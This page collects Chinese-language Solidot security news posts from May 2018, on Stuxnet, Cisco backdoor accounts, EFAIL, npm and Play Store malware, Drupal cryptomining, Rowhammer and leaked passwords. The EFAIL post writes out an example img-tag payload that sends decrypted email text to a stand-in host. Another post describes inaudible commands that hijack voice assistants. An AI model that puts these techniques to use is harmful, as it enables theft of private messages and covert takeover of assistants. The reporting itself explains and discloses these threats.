adv

致长期以来一直关注solidot的海内外朋友,请点击这里查看。
安全
pigsrollaroundinthem(39396)
发表于2018年05月19日 23时00分 星期六
来自Windows 表示不服
Gigantic Software CEO John Byrd 在 Quora 上发表了一篇受到广泛 热议的帖子,认为由一群神秘作者开发的 Stuxnet 蠕虫是至今创造的最复杂软件Stuxnet 是一种计算机蠕虫,大约写于 2005 年到 2010 年之间。这种蠕虫一开始可能只存在于 U 盘里,有人捡到或收到邮寄来的 U 盘,然后插到电脑上看看有什么在里面。当 U 盘插到 Windows PC,它会悄悄运行和拷贝到机器上。它有三种运行方法,如果一种无效就切换到另一种。至少两种方法在当时没人知道,它利用了两种 Windows 0day 漏洞。一旦蠕虫在计算机上运行,它会尝试获得管理员权限,不管机器上是否安装杀毒软件。它能绕过大部分杀毒软件,然后根据运行的 Windows 版本利用两种方法之一获取管理权限。它能隐藏痕迹,杀毒软件无法探测到它的存在。它会检查计算机有没有联网,如果能联网,它会尝试访问 http://www.mypremierfutbol.com 或 http://www.todaysfutbol.com。当时这两个网站服务器托管在马来西亚和丹麦。它会通过加密连接告诉服务器它已经控制了一台新 PC。然后蠕虫自动更新到最新版本。蠕虫会将自己拷贝到任何插到电脑上的 U 盘内,它安装了一个假的设备驱动程序,使用了台湾公司 Realtek 的证书签名。到这个阶段,该蠕虫其实连暖身还没有暖身呢。
安全
pigsrollaroundinthem(39396)
发表于2018年05月18日 18时52分 星期五
来自
思科释出了 16 个安全公告,其中有三个漏洞的威胁评级被归类为高危。这三个漏洞一个是硬编码的后门账号和两个身份系统绕过。根据编号为 CVE-2018-0222 的漏洞描述,思科称 Cisco Digital Network Architecture (DNA) Center 发现了一个未记录的默认管理账号静态用户凭证——即俗称的后门账号。攻击者可利用该账号登录到受影响的系统,能使用 root 权限执行任意代码。思科称该漏洞是在内部的安全测试中发现的。
安全
pigsrollaroundinthem(39396)
发表于2018年05月18日 16时05分 星期五
来自正恩的天山
迈克菲的研究人员报告,朝鲜黑客设法在 Google play 上托管了至少三个应用去窃取脱北者的个人信息。三个应用是通过 Facebook 上的接触选择性的进行传播,在 Google 接到举报下架这些应用前它们被下载了大约 100 次。这些应用包含了隐藏的功能,允许被感染设备接收额外的执行代码,窃取个人照片、通讯簿和短信内容。迈克菲去年 11 月报告它发现有恶意 Android 文件包含的后门与朝鲜黑客组织 Lazarus 使用的后门非常相似。这些相似性包括使用相同的 seed 生成加密密钥,使用相似的方法与控制服务器进行通信。
安全
pigsrollaroundinthem(39396)
发表于2018年05月17日 12时56分 星期四
来自儿童色情罪名更大
去年初,Wikileaks 披露了代号为 Vault 7 的 CIA 黑客工具集。Vault 7 包含了感染 iPhone、Wi-Fi 路由器和思科网关等设备的漏洞利用和文档,被认为是 CIA 历史上已知最大规模的机密信息泄漏。现在,美国政府披露了背后泄密者的身份:29 岁的 Joshua A. Schulte,他已经在一年前就遭到逮捕,FBI 在 Wikileaks 公开第一批 Vault 7 文件后一周就突击搜查了他的家,扣押了手机、电脑和“最高机密的政府情报”,他随即成为泄密调查的主要目标。当局最初是以持有儿童色情的名义指控他的,没有涉及到 Vault 7 泄密。他的律师已经否认其客户卷入了 Vault 7 泄密。Schulte 在 NSA 工作了 4 个月,其职务是系统工程师,在 2010 年以软件工程师的身份进入 CIA,一直工作了六年直至 2016 年加盟彭博社。
长城
pigsrollaroundinthem(39396)
发表于2018年05月15日 23时37分 星期二
来自这次不用先报告给政府
世界最大的美国黑客大会之一首次在中国举办,尽管中国政府警告公民不要与国际安全社区分享工具,但此次大会仍然吸引了大批人参加。随着中国寻求收紧对技术和信息的控制,政府命令本土黑客放弃参加一些全球黑客大赛,尽管如此,上周末仍有逾 1300 人参加了在北京举行的 Def Con 全球黑客大会。“中国成为(在美国以外)举办 Def Con 的最佳地点,是因为未来互联网安全领域确实将会有两个超级大国:美国和中国,”该大会的创办人 Jeff Moss 称,“安全问题是全球性问题,需要全球应对。”该大会强调包括潜在软件漏洞在内的全面开源共享,它试图创造一个空间,使来自不同国家和企业的所谓 “黑客”——出于乐趣(有时是为了赚钱)在计算系统中寻找漏洞和潜在薄弱环节的计算机高手——和网络安全专业人士可以在此分享观点。
安全
pigsrollaroundinthem(39396)
发表于2018年05月15日 21时15分 星期二
来自
xuan 写道 "该漏洞主要原理:在加密块前后插入外置资源引用字段。

比如邮件内容是ABC加密后变为XXX。邮件内容会有很多块组成,多数邮件客户端支持部分块加密、部分块不加密的功能。攻击者可以在加密块前后插入明文块,使得消息变为:

<img src="https://someweb.site/XXX" />

当邮件客户端收到邮件时,需要对加密块解密,并与非加密的内容拼接。得到以下结果:

<img src="https://someweb.site/ABC" />

在邮件客户端渲染这封邮件的时候,会自动的请求someweb.site,并上传邮件内容ABC。导致邮件泄密。

参考来源 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now

Android
pigsrollaroundinthem(39396)
发表于2018年05月12日 22时15分 星期六
来自谷歌的检查
安全研究人员发现,先前被举报而下架的恶意应用又重返了 Google 官方应用商店 Play Store,恶意开发者所采用的方法不过是改了个名字,根本没有修改代码来躲避所谓的自动审核。Play Store 采用自动方法而不是人工审核的方法检查递交的应用,它的自动检查流程被认为存在缺陷,经常会让恶意应用通过检查成功上架,而对于下架的恶意应用 Google 看起来并没有更新它的方法。赛门铁克的研究人员发现了 7 个重新上架的恶意程序,在再次向 Google 安全团队举报之后这些应用又再次下架了。
安全
pigsrollaroundinthem(39396)
发表于2018年05月11日 15时57分 星期五
来自修复漏洞不会增加利润
RSA 安全会议上进行的一项调查发现,绝大多数公司仍然缺乏恰当的安全保护措施,其中一些公司甚至出于不同理由有意忽视安全漏洞,理由从没有时间到缺乏专有技术。调查结果显示,只有 47% 的机构在获悉漏洞之后会尽可能快的修复,26% 的人称他们公司没有时间打补丁,16% 的人称他们公司不知道如何打补丁,16% 要等待一个月时间才会打上补丁,还有 8% 的被调查者称他们一年才打上一到两次补丁。71% 的人承认他们能黑掉自己的公司。
安全
pigsrollaroundinthem(39396)
发表于2018年05月11日 15时45分 星期五
来自云服务泄漏更多数据
蓝色巨人禁止雇员使用可移除存储设备。IBM 的全球首席信息安全官 Shamla Naidoo 在给雇员的通知中称,公司将所有可移除便捷式存储设备(如 USB、SD 卡和闪存盘)包含在禁止数据传输的范围之内。公告声明部分部门已执行这一政策一段时间了,但未来几周这一政策将被公司所有部门采用。IBM 此举旨在最小化误放、丢失或误用可移除存储设备可能导致的财务和名誉损失。如果雇员需要转移数据,IBM 建议他们使用基于云的数据共享方案。
安全
pigsrollaroundinthem(39396)
发表于2018年05月11日 12时40分 星期五
来自激活 66 号令
年轻一代生长在一个习惯与智能设备对话的时代,但有些话可能是你听不见的悄悄话。过去两年,研究人员已经演示了他们能向亚马逊的 Alexa 和 Google Assistant 发送人耳听不到的秘密指令,悄悄激活智能手机或智能音箱的 AI 助手,命令它们拨打电话或打开网站。如果被恶意的人利用,AI 助手也可能被利用解开门禁或给人转钱或购买商品。 现在,加州伯克利的研究人员报告他们能将指令直接嵌入到唱片或语音短信中,在你听管弦乐或听某人的语音时,亚马逊的 Echo 可能会听到指令在你的购物篮里加入东西。
安全
pigsrollaroundinthem(39396)
发表于2018年05月10日 13时32分 星期四
来自相信百度相信彦宏
中国用户报告他通过百度软件中心下载的开源软件 PuTTY 被发现捆绑了恶意程序。在曝光之后,百度已经删除了相关页面和快照(谷歌快照还在)。用户下载的 PuTTY 没有数字签名,启动后首先访问一个 URL,获取想要下载的文件列表,运行时则会在后台静默下载 “金山毒霸” 和“爱奇艺”等程序。对下载网站的分析发现,此事可能是一名百度工程师所为,可能是这名工程师利用职务之便修改程序实施恶意推广。
安全
pigsrollaroundinthem(39396)
发表于2018年05月09日 21时09分 星期三
来自文档是谁写
Linux、Windows、macOS、FreeBSD 和 Xen 实现曝出了一个设计漏洞,允许攻击者劫持或崩溃运行英特尔和 AMD 处理器的计算机。修复补丁基本上都已经释出,Linux 内核早在 3 月份就已经修复。漏洞编号为 CVE-2018-8897,原因被认为是微软、苹果和 Linux 开发者误读英特尔和 AMD 处理器处理特定例外的文档有关。问题的核心是 POP SS 指令。
安全
pigsrollaroundinthem(39396)
发表于2018年05月09日 15时28分 星期三
来自卡巴斯基报告
本周二微软释出了五月例行更新,修复了两个正被攻击者利用的漏洞。第一个漏洞位于 VBScript Engine 中,引擎处理内存的方式存在一个释放后使用的漏洞,允许攻击者利用用户登录系统的相同权限执行任意代码,如果用户以管理员身份登录,这意味着攻击者可以完整控制系统;如果用户的权限较低,那么攻击者也可以组合利用提权漏洞控制系统。该漏洞编号为 CVE-2018-8174,属于高危级漏洞,正被攻击者利用。第二个漏洞则是 Win32k 组件的提权漏洞,编号 CVE-2018-8120,成功利用该漏洞的攻击者可以在内核模式执行任意代码。微软的例行更新共修复了 68 个漏洞,其中 21 个属于高危漏洞。
安全
pigsrollaroundinthem(39396)
发表于2018年05月08日 17时07分 星期二
来自懒得更新
安全研究人员报告,攻击者正利用一个已修复的 Drupal 高危漏洞入侵网站植入挖矿脚本用访问者的计算机挖掘数字货币。被入侵的网站属于联想、UCLA 和美国全国劳资关系委员会等企业、大学和机构所有。美国网站最多,其次是法国、加拿大、德国和俄罗斯。攻击者利用的是今年三月公布的被称为 Drupalgeddon2 的 Drupal 内容管理系统高危漏洞,植入的 JavaScript 文件托管在 vuuwd.com 上,挖矿脚本会使用访问者计算机 80% 的 CPU 资源挖掘门罗币。安全研究员建议使用 Drupal 的网站尽可能快的更新到最新版本。
安全
pigsrollaroundinthem(39396)
发表于2018年05月04日 15时50分 星期五
来自依赖复依赖
Node.js 项目的 NPM 是世界上最大的包管理器。NPM 团队最近发现和阻止了在流行 JavaScript 包中植入后门的一次尝试。后门机制隐藏在最近创造的 JavaScript 库 getcookies 内。对其进行分析后发现,getcookies 含有一个复杂机制能从远处攻击者接收指令,该后门允许攻击者在服务器上输入任何代码然后执行。getcookies 库并不流行,但通过一个嵌套的依赖链它进入到了一个解析电子邮件数据的流行 JS 包 Mailparser 内。Mailparser 包的每周下载量超过 6.6 万。调查人员没有发现利用该后门的攻击。
Twitter
pigsrollaroundinthem(39396)
发表于2018年05月04日 11时42分 星期五
来自内部有间谍
GitHub 之后,Twitter 也承认用户密码在加密前明文储存在了内部日志中,可能导致用户密码泄露(给 Twitter 雇员),所以为谨慎起见它鼓励所有用户修改密码,如果用户复用密码,那么最好也一并修改在其它网站和服务中使用的相同密码。Twitter 称目前没有迹象显示用户密码被内部人士窃取或滥用。几天前,GitHub 也发现一部分用户的密码在加密处理前明文储存在内部日志中,它通知用户这些明文密码可能被该公司的雇员看到。
安全
pigsrollaroundinthem(39396)
发表于2018年05月03日 21时04分 星期四
来自iPhone 更安全
研究人员演示了最新的 Rowhammer 攻击,利用 GPU 翻转比特入侵 Android 手机。 Rowhammer 攻击是指利用临近内存单元之间电子的互相影响,在足够多的访问次数后让某个单元的值从 1 变成 0,反之亦然。这种现象被称为比特翻转(bitflipping),可被利用获取更高的权限。最新的漏洞利用被称为 GLitch(PDF),首次演示了 GPU 能翻转个别储存在 DRAM 中的比特。 GLitch 也是第一个利用标准 JavaScript 入侵智能手机的 Rowhammer 攻击,意味着只需要用户访问一个恶意网站之后就能利用漏洞远程执行代码。GLitch 入侵手机平均不到 2 分钟,比之前的 Rowhammer 攻击高效得多。
安全
pigsrollaroundinthem(39396)
发表于2018年05月03日 12时00分 星期四
来自反正没多少人上网
安全公司 Check Point Software 获得了朝鲜自主研发的杀毒软件 SiliVaccine 的一份拷贝,对其进行分析后发现其源代码关键组件与十多年前的趋势科技杀毒软件相同。趋势科技与朝鲜没有合作关系,因此朝鲜的扫描引擎应该是盗版的。SiliVaccine 的主要功能当然是检测出已知特征的恶意程序,但调查人员发现朝鲜的杀毒软件有意放过了一种恶意程序,而该恶意程序却能被趋势的杀毒软件检测出。SiliVaccine 的一个更新补丁还被发现含有 JAKU 恶意程序,JAKU 主要通过恶意 BT 种子传播,它主要被用于针对和跟踪韩国和日本的特定受害者。这个恶意程序使用了 Ningbo Gaoxinqu zhidian Electric Power Technology Co., Ltd 的证书签名。该公司的证书曾被 APT 组织 Dark Hotel 使用,而 Dark Hotel 和 JAKU 被认为都与朝鲜黑客有关。
安全
pigsrollaroundinthem(39396)
发表于2018年05月02日 19时58分 星期三
来自屡教不改大脑短记忆
Have I Been Pwned 维护者 Troy Hunt 在个人博客上讨论了最新泄漏了 680 万密码,指出了一个老生常谈但因为便于记忆等原因至今无法解决的问题:绝大多数人使用的密码都是弱密码,都已经泄漏在外了。CashCrate 最近被曝在 2016 年 11 月 有 680 万密码外泄,泄漏的数据包括了用户名、地址和电子邮件地址,其中 2,232,284 个密码是明文,其余则是容易破解的 MD5 哈希。在明文密码中,1,910,144 个密码已经包含在 Have I Been Pwned 的密码库中,最常用的密码是 123456、123456789、qwerty、password、111111、12345678、 abc123、password1、1234567 和 12345。至今 CashCrate 仍然允许用户将 123456 作为密码,但不再允许用 12345,因为长度不够。还有一些特别的长密码如 nikki i love u 和 i like to have sex,anchorage alaska 也都有人用过了。密码库里没有的高频密码与 CashCrate 这个网站的名字有关,比如 cashcrate123、CashCrate、mycashcrate 等。
Chrome
pigsrollaroundinthem(39396)
发表于2018年05月02日 16时46分 星期三
来自向谷歌登记
Google Chrome 浏览器从五月一日起开始对在 Certificate Transparency (CT) 系统日志中没有记录的 SSL 证书弹出警告。Chrome 是第一个实现支持 Certificate Transparency Log Policy 的浏览器,其它浏览器开发商也都同意未来支持这一机制。这一政策是 Google 工程师在 2016 年提出的,2018 年生效。该政策要求所有证书签发机构在 CT 中公开它们每天签发的证书。绝大多数 CA 都已经支持公开记录证书的政策。